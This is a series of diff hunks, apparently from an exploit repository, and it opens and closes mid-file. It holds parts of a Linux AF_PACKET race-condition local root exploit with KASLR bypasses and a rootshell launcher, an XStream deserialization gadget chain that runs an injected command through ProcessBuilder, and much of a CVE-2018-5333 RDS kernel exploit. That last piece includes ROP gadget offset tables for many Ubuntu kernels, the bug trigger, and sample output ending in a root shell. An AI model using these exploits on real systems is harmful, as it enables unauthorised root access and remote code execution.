+    char kernel_version[KERNEL_VERSION_SIZE_BUFFER];

    u = get_kernel_version();

@@ -591,7 +651,7 @@ void detect_versions() {
    }

    char *u_ver = strtok(u.version, " ");
-    snprintf(kernel_version, 512, "%s %s", u.release, u_ver);
+    snprintf(kernel_version, KERNEL_VERSION_SIZE_BUFFER, "%s %s", u.release, u_ver);

    int i;
    for (i = 0; i < ARRAY_SIZE(kernels); i++) {
@@ -607,15 +667,17 @@ void detect_versions() {
 }

 // * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
+// https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c

+#if ENABLE_KASLR_BYPASS_SYSLOG
 #define SYSLOG_ACTION_READ_ALL 3
 #define SYSLOG_ACTION_SIZE_BUFFER 10

-bool mmap_syslog(char** buffer, int* size) {
+int mmap_syslog(char** buffer, int* size) {
    *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
    if (*size == -1) {
        dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\n");
-        return false;
+        return 0;
    }

    *size = (*size / getpagesize() + 1) * getpagesize();
@@ -625,16 +687,17 @@ bool mmap_syslog(char** buffer, int* size) {
    *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);
    if (*size == -1) {
        dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL)\n");
-        return false;
+        return 0;
    }

-    return true;
+    return 1;
 }

 unsigned long get_kernel_addr_trusty(char* buffer, int size) {
    const char* needle1 = "Freeing unused";
    char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
-    if (substr == NULL) return 0;
+    if (substr == NULL)
+        return 0;

    int start = 0;
    int end = 0;
@@ -642,22 +705,25 @@ unsigned long get_kernel_addr_trusty(char* buffer, int size) {

    const char* needle2 = "ffffff";
    substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
-    if (substr == NULL) return 0;
+    if (substr == NULL)
+        return 0;

    char* endptr = &substr[16];
-    unsigned long r = strtoul(&substr[0], &endptr, 16);
+    unsigned long addr = strtoul(&substr[0], &endptr, 16);

-    r &= 0xffffffffff000000ul;
+    addr &= 0xffffffffff000000ul;

-    return r;
+    if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
+        return addr;
+
+    return 0;
 }

 unsigned long get_kernel_addr_xenial(char* buffer, int size) {
    const char* needle1 = "Freeing unused";
    char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
-    if (substr == NULL) {
+    if (substr == NULL)
        return 0;
-    }

    int start = 0;
    int end = 0;
@@ -666,17 +732,19 @@ unsigned long get_kernel_addr_xenial(char* buffer, int size) {

    const char* needle2 = "ffffff";
    substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
-    if (substr == NULL) {
+    if (substr == NULL)
        return 0;
-    }

    char* endptr = &substr[16];
-    unsigned long r = strtoul(&substr[0], &endptr, 16);
+    unsigned long addr = strtoul(&substr[0], &endptr, 16);

-    r &= 0xfffffffffff00000ul;
-    r -= 0x1000000ul;
+    addr &= 0xfffffffffff00000ul;
+    addr -= 0x1000000ul;

-    return r;
+    if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
+        return addr;
+
+    return 0;
 }

 unsigned long get_kernel_addr_syslog() {
@@ -699,9 +767,12 @@ unsigned long get_kernel_addr_syslog() {

    return addr;
 }
+#endif

 // * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
+// https://grsecurity.net/~spender/exploits/exploit.txt

+#if ENABLE_KASLR_BYPASS_KALLSYMS
 unsigned long get_kernel_addr_kallsyms() {
    FILE *f;
    unsigned long addr = 0;
@@ -713,7 +784,7 @@ unsigned long get_kernel_addr_kallsyms() {
    dprintf("[.] trying %s...\n", path);
    f = fopen(path, "r");
    if (f == NULL) {
-        dprintf("[-] open/read(%s)\n", path);
+        dprintf("[-] open/read(%s): %m\n", path);
        return 0;
    }

@@ -734,58 +805,23 @@ unsigned long get_kernel_addr_kallsyms() {
    dprintf("[-] kernel base not found in %s\n", path);
    return 0;
 }
-
-// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *
-
-unsigned long get_kernel_addr_sysmap() {
-    FILE *f;
-    unsigned long addr = 0;
-    char path[512] = "/boot/System.map-";
-    char version[32];
-
-    struct utsname u;
-    u = get_kernel_version();
-    strcat(path, u.release);
-    dprintf("[.] trying %s...\n", path);
-    f = fopen(path, "r");
-    if (f == NULL) {
-        dprintf("[-] open/read(%s)\n", path);
-        return 0;
-    }
-
-    char dummy;
-    char sname[256];
-    char* name = "startup_64";
-    int ret = 0;
-    while (ret != EOF) {
-        ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
-        if (ret == 0) {
-            fscanf(f, "%s\n", sname);
-            continue;
-        }
-        if (!strcmp(name, sname)) {
-            fclose(f);
-            return addr;
-        }
-    }
-
-    fclose(f);
-    dprintf("[-] kernel base not found in %s\n", path);
-    return 0;
-}
+#endif

 // * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *
+// https://bugs.chromium.org/p/project-zero/issues/detail?id=1431

+#if ENABLE_KASLR_BYPASS_MINCORE
 unsigned long get_kernel_addr_mincore() {
-    unsigned char buf[getpagesize()/sizeof(unsigned char)];
+    unsigned char buf[getpagesize() / sizeof(unsigned char)];
    unsigned long iterations = 20000000;
    unsigned long addr = 0;

    dprintf("[.] trying mincore info leak...\n");
+
    /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
    if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE,
-        MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {
-        dprintf("[-] mmap()\n");
+          MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {
+        dprintf("[-] mmap(): %m\n");
        return 0;
    }

@@ -793,46 +829,50 @@ unsigned long get_kernel_addr_mincore() {
    for (i = 0; i <= iterations; i++) {
        /* Touch a mishandle with this type mapping */
        if (mincore((void*)0x86000000, 0x1000000, buf)) {
-            dprintf("[-] mincore()\n");
+            dprintf("[-] mincore(): %m\n");
            return 0;
        }

        int n;
-        for (n = 0; n < getpagesize()/sizeof(unsigned char); n++) {
+        for (n = 0; n < getpagesize() / sizeof(unsigned char); n++) {
            addr = *(unsigned long*)(&buf[n]);
            /* Kernel address space */
-            if (addr > 0xffffffff00000000) {
+            if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX) {
                addr &= 0xffffffffff000000ul;
                if (munmap((void*)0x66000000, 0x20000000000))
-                    dprintf("[-] munmap()\n");
+                    dprintf("[-] munmap(): %m\n");
                return addr;
            }
        }
    }

    if (munmap((void*)0x66000000, 0x20000000000))
-        dprintf("[-] munmap()\n");
+      dprintf("[-] munmap(): %m\n");

    dprintf("[-] kernel base not found in mincore info leak\n");
    return 0;
 }
+#endif

 // * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *

 unsigned long get_kernel_addr() {
    unsigned long addr = 0;

+#if ENABLE_KASLR_BYPASS_KALLSYMS
    addr = get_kernel_addr_kallsyms();
    if (addr) return addr;
+#endif

-    addr = get_kernel_addr_sysmap();
-    if (addr) return addr;
-
+#if ENABLE_KASLR_BYPASS_SYSLOG
    addr = get_kernel_addr_syslog();
    if (addr) return addr;
+#endif

+#if ENABLE_KASLR_BYPASS_MINCORE
    addr = get_kernel_addr_mincore();
    if (addr) return addr;
+#endif

    dprintf("[-] KASLR bypass failed\n");
    exit(EXIT_FAILURE);
@@ -851,7 +891,7 @@ void launch_rootshell(void)
    fd = open(SYSCTL_PATH, O_WRONLY);

    if(fd == -1) {
-        dprintf("[-] could not open %s\n", SYSCTL_PATH);
+        dprintf("[-] open(%s): %m\n", SYSCTL_PATH);
        exit(EXIT_FAILURE);
    }

@@ -877,12 +917,12 @@ void launch_rootshell(void)

 void setup_sandbox() {
    if (unshare(CLONE_NEWUSER) != 0) {
-        dprintf("[-] unshare(CLONE_NEWUSER)\n");
+        dprintf("[-] unshare(CLONE_NEWUSER): %m\n");
        exit(EXIT_FAILURE);
    }

    if (unshare(CLONE_NEWNET) != 0) {
-        dprintf("[-] unshare(CLONE_NEWNET)\n");
+        dprintf("[-] unshare(CLONE_NEWNET): %m\n");
        exit(EXIT_FAILURE);
    }
 }
@@ -890,8 +930,6 @@ void setup_sandbox() {
 int main(int argc, char **argv)
 {
    int status, pid;
-    struct utsname u;
-    char buf[512], *f;

    if (getuid() == 0 && geteuid() == 0) {
        chown("/proc/self/exe", 0, 0);
@@ -908,11 +946,11 @@ int main(int argc, char **argv)

    dprintf("linux AF_PACKET race condition exploit by rebel\n");

-    dprintf("[.] starting\n");
-
-    dprintf("[.] checking hardware\n");
-    check_procs();
-    dprintf("[~] done, hardware looks good\n");
+#if ENABLE_SYSTEM_CHECKS
+    dprintf("[.] checking system\n");
+    check_env();
+    dprintf("[~] done, looks good\n");
+#endif

    dprintf("[.] checking kernel version\n");
    detect_versions();
@@ -0,0 +1,54 @@
+<map>
+  <entry>
+    <jdk.nashorn.internal.objects.NativeString>
+      <flags>0</flags>
+      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
+        <dataHandler>
+          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
+            <is class="javax.crypto.CipherInputStream">
+              <cipher class="javax.crypto.NullCipher">
+                <initialized>false</initialized>
+                <opmode>0</opmode>
+                <serviceIterator class="javax.imageio.spi.FilterIterator">
+                  <iter class="javax.imageio.spi.FilterIterator">
+                    <iter class="java.util.Collections$EmptyIterator"/>
+                    <next class="java.lang.ProcessBuilder">
+                      <command>
+                        <%=payload_cmd%>
+                      </command>
+                      <redirectErrorStream>false</redirectErrorStream>
+                    </next>
+                  </iter>
+                  <filter class="javax.imageio.ImageIO$ContainsFilter">
+                    <method>
+                      <class>java.lang.ProcessBuilder</class>
+                      <name>start</name>
+                      <parameter-types/>
+                    </method>
+                    <name>foo</name>
+                  </filter>
+                  <next class="string">foo</next>
+                </serviceIterator>
+                <lock/>
+              </cipher>
+              <input class="java.lang.ProcessBuilder$NullInputStream"/>
+              <ibuffer></ibuffer>
+              <done>false</done>
+              <ostart>0</ostart>
+              <ofinish>0</ofinish>
+              <closed>false</closed>
+            </is>
+            <consumed>false</consumed>
+          </dataSource>
+          <transferFlavors/>
+        </dataHandler>
+        <dataLen>0</dataLen>
+      </value>
+    </jdk.nashorn.internal.objects.NativeString>
+    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
+  </entry>
+  <entry>
+    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+  </entry>
+</map>
@@ -0,0 +1,883 @@
+// Local root exploit for Linux RDS rds_atomic_free_op NULL pointer dereference
+// in the rds kernel module in the Linux kernel through 4.14.13 (CVE-2018-5333).
+//
+// Includes KASLR, SMEP, and mmap_min_addr bypasses. No SMAP bypass.
+//
+// Targets:
+// - Ubuntu 16.04 kernels 4.4.0 <= 4.4.0-116
+// - Ubuntu 16.04 kernels 4.8.0 <= 4.8.0-54
+//
+// The rds kernel module is not loaded by default on Ubuntu, and is blacklisted
+// in /etc/modprobe.d/blacklist-rare-network.conf to prevent autoloading.
+// - install: sudo apt install "linux-image-extra-$(uname -r)-generic"
+// - load:    sudo insmod "/lib/modules/$(uname -r)/kernel/net/rds/rds.ko"
+//
+// This exploit is a modified extension of the original local root
+// proof of concept exploit written by wbowling as an example of using
+// CVE-2019-9213 to make previous kernel bugs exploitable:
+// - https://gist.github.com/wbowling/9d32492bd96d9e7c3bf52e23a0ac30a4
+//
+// The original exploit is based on the null pointer dereference
+// reproducer proof of concept and analysis by 0x36:
+// - https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c
+//
+// wbowling has done most of the hard work, by utilising Jann Horn's
+// mmap_min_addr bypass technique (CVE-2019-9213), allowing userland to mmap
+// virtual address 0 (without which this bug would not be exploitable on
+// systems with a sufficiently large value for vm.mmap_min_addr);
+// and developing the appropriate ROP chain.
+// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2
+//
+// This exploit adds offsets for additional kernels, and introduces some
+// additional features, such as KASLR bypasses and system checks, including:
+// - check if system supports SMAP
+// - check if system supports RDS sockets
+// - Jann Horn's mincore KASLR bypass via heap page disclosure (CVE-2017-16994)
+//   - https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
+// - spender's /proc/kallsyms KASLR bypass (requires kernel.kptr_restrict=0)
+//   - https://grsecurity.net/~spender/exploits/exploit.txt
+// - xairy's syslog KASLR bypass (requires kernel.dmesg_restrict=0)
+//   - https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
+// - lizzie's perf_event_open KASLR bypass (requires kernel.perf_event_paranoid<2)
+//   - https://blog.lizzie.io/kaslr-and-perf.html
+//
+// Shoutout to nstarke for adding additional kernel offsets.
+// - https://github.com/bcoles/kernel-exploits/pulls?q=author:nstarke+cve-2018-5333
+//
+// This exploit also uses various code patterns copied from:
+// - xairy's exploits:
+//   - https://github.com/xairy/kernel-exploits
+// - vnik's kernel ROP code:
+//   - https://github.com/vnik5287/kernel_rop
+// ---
+// $ gcc cve-2018-5333.c -o cve-2018-5333 -Wall
+// $ ./cve-2018-5333
+// Linux RDS rds_atomic_free_op NULL pointer dereference local root (CVE-2018-5333)
+// [.] checking kernel version...
+// [.] kernel version '4.4.0-116-generic #140-Ubuntu' detected
+// [~] done, version looks good
+// [.] checking system...
+// [~] done, looks good
+// [.] mapping null address...
+// [~] done, mapped null address
+// [.] KASLR bypass enabled, getting kernel base address
+// [.] trying /proc/kallsyms...
+// [-] kernel base not found in /proc/kallsyms
+// [.] trying syslog...
+// [-] kernel base not found in syslog
+// [.] trying perf_event_open sampling...
+// [.] done, kernel text:   ffffffff9f000000
+// [.] commit_creds:        ffffffff9f0a4cf0
+// [.] prepare_kernel_cred: ffffffff9f0a50e0
+// [.] mmapping fake stack...
+// [~] done, fake stack mmapped
+// [.] executing payload 0x402119...
+// [+] got root
+// # id
+// uid=0(root) gid=0(root) groups=0(root)
+// ---
+// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2018-5333
+// <bcoles@gmail.com>
+
+#define _GNU_SOURCE
+
+#include <fcntl.h>
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <linux/perf_event.h>
+#include <netinet/in.h>
+#include <sys/ioctl.h>
+#include <sys/klog.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/utsname.h>
+
+#define DEBUG
+
+#ifdef DEBUG
+#  define dprintf printf
+#else
+#  define dprintf
+#endif
+
+#define ENABLE_SYSTEM_CHECKS            1
+#define ENABLE_KASLR_BYPASS             1
+
+#if ENABLE_KASLR_BYPASS
+#  define KERNEL_BASE_MIN               0xffffffff00000000ul
+#  define KERNEL_BASE_MAX               0xffffffffff000000ul
+#  define ENABLE_KASLR_BYPASS_KALLSYMS  1
+#  define ENABLE_KASLR_BYPASS_SYSLOG    1
+#  define ENABLE_KASLR_BYPASS_PERF      1
+#  define ENABLE_KASLR_BYPASS_MINCORE   1
+#endif
+
+// Can be overwritten by argv[1]
+char *SHELL = "/bin/sh";
+
+// Will be overwritten if ENABLE_KASLR_BYPASS is enabled (1)
+unsigned long KERNEL_BASE = 0xffffffff81000000ul;
+
+// Will be overwritten by detect_versions().
+int kernel = -1;
+
+// kernel target struct, using ROP chain from wbowling's exploit
+struct kernel_info {
+  const char* kernel_version;
+  uint64_t commit_creds;
+  uint64_t prepare_kernel_cred;
+  uint64_t xor_rdi;     //: xor edi, edi ; ret
+  uint64_t mov_rdi_rax; //: mov rdi, rax ; pop rbx ; mov rax, rdi ; pop r12 ; pop rbp ; ret
+  uint64_t xchg_esp;    //: xchg eax, esp ; shr bl, 0xbf ; xor eax, eax ; pop rbp ; ret
+  uint64_t swapgs;      //: swapgs ; pop rbp ; ret
+  uint64_t iretq;       //: iretq
+};
+
+// Targets
+struct kernel_info kernels[] = {
+  { "4.4.0-21-generic #37-Ubuntu",   0xa21c0, 0xa25b0, 0x5d0c5, 0x178157, 0x3f8158, 0x64644, 0x4cc7da },
+  { "4.4.0-22-generic #40-Ubuntu",   0xa2220, 0xa2610, 0x5d0c5, 0x178217, 0x3f89e8, 0x64644, 0x7d005  },
+  { "4.4.0-24-generic #43-Ubuntu",   0xa2340, 0xa2730, 0x5d0c5, 0x178447, 0x3f98b8, 0x64644, 0x7d125  },
+  { "4.4.0-28-generic #47-Ubuntu",   0xa24a0, 0xa2890, 0x5d0c5, 0x178717, 0x3f9f38, 0x64644, 0x585dc  },
+  { "4.4.0-31-generic #50-Ubuntu",   0xa24a0, 0xa2890, 0x5d0c5, 0x1787a7, 0x3ffed8, 0x64644, 0x7d125  },
+  { "4.4.0-38-generic #57-Ubuntu",   0xa2570, 0xa2960, 0x5d0c5, 0x178a97, 0x400968, 0x64634, 0x7d1e5  },
+  { "4.4.0-42-generic #62-Ubuntu",   0xa25c0, 0xa29b0, 0x5d0c5, 0x178ac7, 0x400d78, 0x64634, 0x7d1a5  },
+  { "4.4.0-98-generic #121-Ubuntu",  0xa2850, 0xa2c40, 0x5d0c5, 0x17a427, 0x40a138, 0x64694, 0x4b243  },
+  { "4.4.0-108-generic #131-Ubuntu", 0xa3420, 0xa3810, 0x5d0c5, 0x17af37, 0x40aa98, 0x646a4, 0x7dd35  },
+  { "4.4.0-109-generic #132-Ubuntu", 0xa3420, 0xa3810, 0x5d0c5, 0x17af37, 0x40aa98, 0x646a4, 0x7dd35  },
+  { "4.4.0-112-generic #135-Ubuntu", 0xa3a90, 0xa3e80, 0x5d0c5, 0x17b657, 0x40b238, 0x646a4, 0x54137c },
+  { "4.4.0-116-generic #140-Ubuntu", 0xa4cf0, 0xa50e0, 0x5e0c5, 0x17d5d7, 0x40ed08, 0x65734, 0x3a5b04 },
+
+  /* Untested:
+  { "4.4.0-51-generic #72-Ubuntu",   0xa2670, 0xa2a60, 0x5d0c5, 0x178cf7, 0x404d78, 0x64634, 0x7d1a5  },
+  { "4.4.0-62-generic #83-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179747, 0x406a78, 0x64634, 0x7d1e5  },
+  { "4.4.0-63-generic #84-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179827, 0x406e98, 0x64634, 0x406eb  },
+  { "4.4.0-66-generic #87-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179827, 0x406e98, 0x64634, 0x406eb  },
+  { "4.4.0-70-generic #91-Ubuntu",   0xa27b0, 0xa2ba0, 0x5d0c5, 0x179847, 0x4070c8, 0x64664, 0x406eb  },
+  { "4.4.0-79-generic #100-Ubuntu",  0xa2800, 0xa2bf0, 0x5d0c5, 0x179a67, 0x408338, 0x64664, 0x7d235  },
+  { "4.4.0-87-generic #110-Ubuntu",  0xa2860, 0xa2c50, 0x5d0c5, 0x179ca7, 0x408768, 0x64694, 0x7d285  },
+  { "4.4.0-89-generic #112-Ubuntu",  0xa28a0, 0xa2c90, 0x5d0c5, 0x179d27, 0x408ae8, 0x64694, 0x7d265  },
+  { "4.4.0-96-generic #119-Ubuntu",  0xa28c0, 0xa2cb0, 0x5d0c5, 0x179e27, 0x409a48, 0x64694, 0x7d235  },
+  { "4.4.0-97-generic #120-Ubuntu",  0xa2850, 0xa2c40, 0x5d0c5, 0x179e47, 0x409a58, 0x64694, 0x4ed41  },
+  */
+
+  { "4.4.0-21-lowlatency #37-Ubuntu",   0xa3150, 0xa3560, 0x5e0c5, 0x17b2c7, 0x401288, 0x64d34, 0x7d95c },
+  { "4.4.0-22-lowlatency #40-Ubuntu",   0xa31c0, 0xa35d0, 0x5e0c5, 0x17b397, 0x401b48, 0x64d34, 0x7d9bc },
+  { "4.4.0-24-lowlatency #43-Ubuntu",   0xa32e0, 0xa36f0, 0x5e0c5, 0x17b5e7, 0x402958, 0x64d34, 0x7dadc },
+  { "4.4.0-28-lowlatency #47-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b8c7, 0x402f48, 0x64d34, 0x7dadc },
+  //{ "4.4.0-31-lowlatency #50-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b9a7, 0x409018, 0x64d34, 0x7dadc },
+  //{ "4.4.0-34-lowlatency #53-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b9a7, 0x409088, 0x64d34, 0x7dadc },
+  { "4.4.0-36-lowlatency #55-Ubuntu",   0xa3430, 0xa3840, 0x5e0c5, 0x17b9e7, 0x409318, 0x64d24, 0x7dacc },
+  { "4.4.0-38-lowlatency #57-Ubuntu",   0xa3500, 0xa3910, 0x5e0c5, 0x17bcb7, 0x409b38, 0x64d24, 0x4c030 },
+  { "4.4.0-42-lowlatency #62-Ubuntu",   0xa3560, 0xa3970, 0x5e0c5, 0x17bcf7, 0x409f68, 0x64d24, 0x7db6c },
+  { "4.4.0-98-lowlatency #121-Ubuntu",  0xa38c0, 0xa3cd0, 0x5e0c5, 0x17d737, 0x413408, 0x64d84, 0x24454 },
+  { "4.4.0-109-lowlatency #132-Ubuntu", 0xa5530, 0xa5940, 0x5f0c5, 0x17f257, 0x414c18, 0x65d94, 0x7f7ac },
+  { "4.4.0-112-lowlatency #135-Ubuntu", 0xa5bd0, 0xa5fe0, 0x5f0c5, 0x17f9a7, 0x415448, 0x65d94, 0x7f8dc },
+  { "4.4.0-116-lowlatency #140-Ubuntu", 0xa6e00, 0xa7210, 0x600c5, 0x1818f7, 0x418a38, 0x66de4, 0x809ef },
+
+  { "4.8.0-34-generic #36~16.04.1-Ubuntu", 0xa5d50, 0xa6140, 0x5d0c5, 0x1876d7, 0x43d208, 0x642f4, 0x7ed2b },
+  { "4.8.0-36-generic #36~16.04.1-Ubuntu", 0xa5d50, 0xa6140, 0x5d0c5, 0x1876d7, 0x43d208, 0x642f4, 0x7ed2b },
+  { "4.8.0-39-generic #42~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43da98, 0x642f4, 0x7ed2b },
+  { "4.8.0-41-generic #44~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43da98, 0x642f4, 0x7ed2b },
+  { "4.8.0-42-generic #45~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dea8, 0x642f4, 0x5c4f3 },
+  { "4.8.0-44-generic #47~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-45-generic #48~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-46-generic #49~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-49-generic #52~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43dce8, 0x642f4, 0x7ed3b },
+  { "4.8.0-51-generic #54~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43dce8, 0x642f4, 0x7ed3b },
+  { "4.8.0-52-generic #55~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  { "4.8.0-53-generic #56~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  { "4.8.0-54-generic #57~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  //{ "4.8.0-56-generic #61~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e278, 0x642f4, 0x7ed3b },
+  //{ "4.8.0-58-generic #63~16.04.1-Ubuntu", 0xa5d20, 0xa6110, 0x5d0c5, 0x187797, 0x43dfa8, 0x642f4, 0x7ed5b },
+
+  { "4.8.0-34-lowlatency #36~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18ae07, 0x4467f8, 0x649f4, 0x7f902 },
+  { "4.8.0-36-lowlatency #36~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18ae07, 0x4467f8, 0x649f4, 0x7f902 },
+  //{ "4.8.0-39-lowlatency #42~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aec7, 0x4470d8, 0x649f4, 0x7f902 },
+  { "4.8.0-41-lowlatency #44~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aec7, 0x4470d8, 0x649f4, 0x7f902 },
+  { "4.8.0-42-lowlatency #45~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447428, 0x649f4, 0x4b3e3 },
+  { "4.8.0-44-lowlatency #47~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447108, 0x649f4, 0x4b3e3 },
+  { "4.8.0-45-lowlatency #48~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447108, 0x649f4, 0x4b3e3 },
+  { "4.8.0-46-lowlatency #49~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447108, 0x649f4, 0x4b3e3 },
+  { "4.8.0-49-lowlatency #52~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x447278, 0x649f4, 0x4b3e3 },
+  { "4.8.0-51-lowlatency #54~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x447278, 0x649f4, 0x4b3e3 },
+  { "4.8.0-52-lowlatency #55~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x4b3e3 },
+  { "4.8.0-53-lowlatency #56~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x4b3e3 },
+  { "4.8.0-54-lowlatency #57~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x7f912 },
+  //{ "4.8.0-56-lowlatency #61~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477f8, 0x649f4, 0x7f912 },
+  //{ "4.8.0-58-lowlatency #63~16.04.1-Ubuntu", 0xa6ef0, 0xa7300, 0x5e0c5, 0x18aee7, 0x447568, 0x649f4, 0x7f932 },
+
+  //{ "4.10.0-14-generic #16~16.04.1-Ubuntu", 0xab610, 0xaba00, 0x600c5, 0x194ac7, 0x458288, 0x67764, 0x34c4b },
+  //{ "4.13.0-16-generic #19~16.04.3-Ubuntu", 0xa8220, 0xa85f0, 0x5f0c5, 0x19c8a7, 0x462d18, 0x668b4, 0x2f2d4 },
+  //{ "4.13.0-37-generic #42~16.04.1-Ubuntu", 0xab1d0, 0xab5a0, 0x610c5, 0x1a0827, 0x46bf58, 0x68944, 0x3381b },
+};
+
+// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
+// https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c
+
+#define RAND_SIZE 4096
+
+#ifndef SOL_RDS
+#  define SOL_RDS 276
+#endif
+#ifndef RDS_CMSG_MASKED_ATOMIC_CSWP
+#  define RDS_CMSG_MASKED_ATOMIC_CSWP 9
+#endif
+#ifndef AF_RDS
+#  define AF_RDS 0x15
+#endif
+
+void trigger_bug()
+{
+  struct sockaddr_in sin;
+  struct msghdr msg;
+  char buf[RAND_SIZE];
+  struct cmsghdr cmsg;
+
+  memset(&sin, 0, sizeof(struct sockaddr));
+  memset(&msg, 0, sizeof(msg));
+  memset(buf, 0x40, sizeof(buf));
+  memset(&cmsg, 0, sizeof(cmsg));
+
+  int fd = socket(AF_RDS, 5, 0);
+  if(fd < 0) {
+    dprintf("[-] socket(AF_RDS): %m\n");
+    return;
+  }
+
+  sin.sin_family = AF_INET;
+  sin.sin_port = htons(2000);
+  sin.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+
+  bind(fd, (struct sockaddr*)&sin, sizeof(sin));
+
+  cmsg.cmsg_len = RAND_SIZE;
+  cmsg.cmsg_type = RDS_CMSG_MASKED_ATOMIC_CSWP;
+  cmsg.cmsg_level = SOL_RDS;
+
+  memcpy(&buf[0], &cmsg, sizeof(cmsg));
+
+  *(uint64_t *)(buf + 0x18) = 0x40404000; /* args->local_addr */
+
+  msg.msg_name = &sin;
+  msg.msg_namelen = sizeof(sin);
+  msg.msg_iov = NULL;
+  msg.msg_iovlen = 0;
+  msg.msg_control = buf;
+  msg.msg_controllen = RAND_SIZE;
+  msg.msg_flags = MSG_DONTROUTE|MSG_PROXY|MSG_WAITALL;
+
+  sendmsg(fd, &msg, 0);
+}
+
